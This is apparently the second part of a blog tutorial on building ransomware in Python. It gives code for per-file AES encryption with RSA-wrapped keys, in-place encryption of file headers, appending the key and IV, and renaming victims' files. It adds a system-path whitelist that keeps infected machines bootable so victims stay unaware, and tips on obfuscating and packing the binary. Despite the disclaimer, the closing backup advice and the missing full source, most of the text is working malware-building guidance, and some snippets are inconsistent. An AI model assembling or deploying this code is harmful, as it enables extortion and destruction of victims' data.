In part 1(https://securityshenaningans.medium.com/architecture-of-a-ransomware-1-2-1b9fee757fcb) we explained key concepts necessary to understand how efficient ransomware works. In this part, we’ll illustrate a couple of these concepts with some python code. We’ll also go into basic usage of the pycryptodome python library for encryption. I won’t be publishing the full source code since I don’t want to help script kiddies on their criminal careers. The purpose of this article is only to share knowledge about ransomware malware and it shouldn’t be used for malicious activities.
There are multiple open source ransomwares available, and when reading about ransomware development, I came across a great ransomware called GonnaCry, written by Tarcísio Marinho. The code is very clear and I highly recommend you check it out.
His ransomware contains all the code for the “management side”. He actually coded the server on the attacking side which will manage the decryption keys, and communicate with the infected client, as well as a wallpaper changer.
I didn’t want to get into this aspect since I wrote all my code to learn how ransomware works, and every strain of real-life ransomware handles this side of things differently. You might have an automated service that registers payments and sends decryption keys. You might have a Tor email address and interact with the victim directly. You might even have a system that allows the client to submit a couple of sample files to verify that you can decrypt them. Whatever you have, this varies on each campaign so coding this part wasn’t in my scope. I focused mainly on the client infection side.
Language of choice
I choose python for a couple of reasons. The main one is that its really easy to read and understand.
It can also be cross-platform as long as you avoid using OS specific instructions (such as the ones called with os.system). Its also fast, and has libraries for most of the encryption operations we need to perform. Lastly, it allows you to obfuscate the compiled code, which we’ll do to make reverse engineering of our final binary harder.
When evaluating python libraries, you might find multiple imports that do the same thing. Its always a prudent approach to research each one and choose the most used one, specially when it involves a fast changing topic such as cryptography. You don’t want your ransomware to be decrypted just because you used and outdated library, or even worse, you developed your own encryption schemes, just as Lockcrypt did (don’t do this). We’ll be using two known python libraries: pycryptodome, and secrets.
Note: In practice, you have wrappers that do the combined asymmetric + symmetric encryption for you (such as asymcrypt). I will however be using straight pycryptodome and creating each function to better illustrate the concepts.
Summary of necessary functions
- generate32ByteKey(): generates a random 32-bytes key. There are multiple ways to do this. You could grab a string from /dev/urandom and sha256sum it, but this would be linux-dependant, and we wanted to do this cross platform, so we’ll use the python’s secrets library. This can be done with secrets.token_hex(32).
- rsaEncryptSecret(string, publicKey): this will encrypt a secret asymmetrically with a public key (so that it can only be decrypted with the private key). This will allow us to encrypt the symmetric key generated for each file with our publicKey. The client will need our privateKey to decrypt each file’s symmetric key, and then decrypt each file with its own symmetric key.
- rsaDecryptSecret(secret, privateKey): this will decrypt an encrypted symmetric key with a private asymmetric key.
- symEncryptFile(publicKey, file): this function is the most complicated one, as it will have the encryption logic inside it. It’ll be further explained below, but as its name suggests, its used to encrypt the files.
- symDecryptFile(privateKey, file): this decrypts a file.
- symEncryptDirectory(publicKey, dir): this function will receive a directory as a parameter and travel it recursively to get all the files inside it. After that it will call symEncryptFile with the publicKey.
- symDecryptDirectory(privateKey, dir): similar to symEncryptDirectory, but the other way around…
This will encrypt a secret key with RSA. RSA by default encrypts without any randomness so we’ll be using Optimal asymmetric encryption padding (OAEP for short) which is a padding scheme that improves basic RSA adding both randomness and a one-way permutation trapdoor. Remember that when using RSA with OAEP, the resulting cypher size should be the same as the modulus. And the modulus is the key size / 8. We’re using 2048bit RSA, so the resulting cyphertext should be 256 bytes.
Here’s a simple code snippet to achieve this.
def rsaEncryptSecret(string, publicKey):
public_key = get_key(publicKey, None)
# Create the cipher object
cipher_rsa = PKCS1_OAEP.new(public_key)
# We need to encode the string to work with bytes instead of chars
bytestrings = str.encode(string)
cipher_text = cipher_rsa.encrypt(bytestrings)
#At this point the cipher_text should be 256 bytes in length
# We'll base64 encode it for convenience
# Remember that a base64 string needs to be divisible by 3, so 256 bytes will become 258 with padding
This will decrypt a cipher text with a provided secret key.
def rsaDecryptSecret(string, privateKey):
# We firts import the private Key
private_key = get_key(privateKey, None)
# Decode the base64 encoded string
base64DecodedSecret = base64.b64decode(string)
# create the cipher object
cipher_rsa = PKCS1_OAEP.new(private_key)
# Decrypt the content
decryptedBytestrings = cipher_rsa.decrypt(base64DecodedSecret)
# Remember to convert the decoded cipher from bytes to string
decryptedSecret = decryptedBytestrings.decode()
This will be the main encryption function. This is how it’ll work:
- Call the function with a publicKey and a file path as a parameter
def symEncryptFile(publicKey, file):
2. Generate a random key for this specific file
key = generateKey()
3. Encrypt the random key with the publicKey.
encriptedKey = rsaEncryptSecret(key, publicKey)
4. Define an encryption size (n bytes) for the file. In this example we’ll use 1MB.
buffer_size = 1048576
5. Check that the file isn’t already encrypted, and if it is, ignore it.
if file.endswith("." + cryptoName):
print('File is already encrypted, skipping')
6. Encrypt the first n bytes of the file and overwrite its content.
# Open the input and output files
input_file = open(file, 'r+b')
print("Encrypting file: "+ file)
output_file = open(file + '.' + cryptoName, 'w+b')# Create the cipher object and encrypt the data
cipher_encrypt = AES.new(key, AES.MODE_CFB)# Encrypt file first
buffer = input_file.read(buffer_size)
ciphered_bytes = cipher_encrypt.encrypt(buffer)input_file.seek(0)
7. Append the encrypted random key to the end of the file.
8. Append the AES IV (initialization vector) to the end of the file.
9. Rename the file to identify it.
os.rename(file, file + "." + cryptoName)
Note how we didn’t need to copy the full file, we just used the
seek() method over the file object to navigate the bytes and make the process as quick as possible. This will also be used in the decryption function.
Also note that since we’re writing both the AES IV and the encrypted key in the encrypted file, we don’t need any kind of txt file with a track of each encrypted file. The victim can just send us any file, and as long as we have the private key used for that specific binary, we’ll be able to decrypt it.
This will be the main decryption function. This is how it’ll work:
- Call the function with a privateKey and a file path as a parameter
def symDecryptFile(privateKey, file):
2. Define an decryption size (n bytes) for the file (equal to the one used in the encryption). In our example we used 1MB.
buffer_size = 1048576
3. Verify that the file is encrypted (with its extension).
if file.endswith("." + cryptoName):
out_filename = file[:-(len(cryptoName) + 1)]
print("Decrypting file: " + file)
print('File is not encrypted')
4. Open the file and read the AES IV (the last 16 bytes).
input_file = open(file, 'r+b')# Read in the iv
iv = input_file.read(16)
5. Read the encrypted decryption key. This will be
# we move the pointer to 274 bytes before the end of file
# (258 bytes of the encryption key + 16 of the AES IV)
# And we read the 258 bytes of the key
secret = input_file.read(258)
6. Decrypt the encrypted key with the provided private key
key = rsaDecryptSecret(cert, secret)
7. Decrypt the aes-encrypted buffer size we defined before, and write it to the beginning of the file
# Create the cipher object
cipher_encrypt = AES.new(privateKey, AES.MODE_CFB, iv=iv)
# Read the encrypted header
buffer = input_file.read(buffer_size)
# Decrypt the header with the key
decrypted_bytes = cipher_encrypt.decrypt(buffer)
# Write the decrypted text on the same file
8. Delete the iv + encryption key from the end of the file and rename it.
# Delete the last 274 bytes from the IV + key.
# Rename the file to delete the encrypted extension
Having all these functions, you can create a single binary that lets you either encrypt or decrypt your folder of choice. If you correctly coded the symEncryptDirectory / symDecryptDirectory functions, you can just pick either the encryption or the decryption of a parameter folder/file and just pass a .pem file. You would have something similar to this on the binary before the main call.
parser = argparse.ArgumentParser()parser.add_argument("--dest", "-d", help="File or directory to encrypt/decrypt", dest="destination", default="none", required=True)parser.add_argument("--action", "-a", help="Action (encrypt/decrypt)", dest="action", required=True)
parser.add_argument("--pem","-p", help="Public/Private key", dest="key", required=True)
Aside from the obvious error validation missing (check if the “encrypt” action has a public key passed as a parameter, the “decrypt” has a private one, etc…), you’ll have to define a “whitelist” of files/folders for each operating system. You’ll need to do this in order to leave the computer “usable” but encrypted. If you just start encrypting every file on sight you’ll probably:
1. Make the computer unusable for the user, who’ll realize somethings wrong
2. After encrypting everything, the system won’t boot and the user won’t know that he’s been hit by ransomware.
Just to give you an example, in Linux the whitelist would be something similar to this:
whitelist = ["/etc/ssh", "/etc/pam.d", "/etc/security/", "/boot", "/run", "/usr", "/snap", "/var", "/sys", "/proc", "/dev", "/bin", "/sbin", "/lib", "passwd", "shadow", "known_hosts", "sshd_config", "/home/sec/.viminfo", '/etc/crontab', "/etc/default/locale", "/etc/environment"]
You’ll probably want to pack the .py script with all of its dependencies and bundle it into a single executable. I’m not going to show a step by step, but you can look into pyarmor and pyinstaller. Also, depending on the type of obfuscation you want to use (and the type of binary), Nuitka can be of great help.
Other flavours of ransomware (MBR encryption)
There’s another flavour of ransomware that we didn’t touch, and those are the ones that infect the Master Boot Record of your drive. This, in turn, allows it to run a payload which will encrypt the filesystem’s NTFS file tables, which will render the disk unusable. This approach is very quick since the malware only needs to encrypt a small portion of data. The Petya ransomware is an excellent example of this design. It has three main disadvantages:
the first is that even when the OS is left unbootable, you can still recover your files with forensic analysis. They are not deleted, they are just de-referenced in the file table. Even if the malware starts an encryption routine for the raw data after rebooting the computer, if the victim just shuts down the computer and takes the disk out, the files should be recoverable with some forensic analisis.
The second disadvantage is that most modern OS don’t use MBR anymore since they’ve migrated to GPT (GUID Partition Table).
The third disadvantage is that it is heavily filesystem dependent, and that it would need to be modified to contemplate other filesystem types which do not behave like NTFS (think EXT3/EXT4, ZFS and so).
This approach requires a lot more low-level technical concepts and I didn’t want to extend this post that much. Also, this methodology is not the most frequently used, and my main intent writing this article was to make readers better understand “common” ransomware.
Conclusion / General Advice
Aside from the obvious frequent recommendations that you should be aware of (don’t open attachments from unknown sources, keep your infrastructure updated, run anti-malware software, etc…), the main prevention technique I can recommend is backup, backup and backup… You will hear a lot of advice on how to prevent an attack, but in my opinion, the best is to always assume that you’ll eventually get infected and have an offline backup of your data.
Even if you’re 100% trained to recognize malicious vectors, one of your organization’s users might not be, and that’s all it takes to encrypt all the mapped shared drives.
Lastly, one thing that I haven’t seen anybody recommend: if you got infected, and the encrypted files don’t need to be recovered right away (family pictures, videos, etc…), try to keep a copy of the encrypted files. Sometimes the malware developers either retire (Shade, TeslaCrypt, HildaCrypt), or get arrested (CoinVault), or even publish the key of its competitors (Petya vs Chimera) and in all these situations the decryption keys might get published. You might get lucky and end up recovering your files a couple of months later.
That’s all for this post. I hope it was helpful, and that you now have better tools to respond to your next ransomware encounter!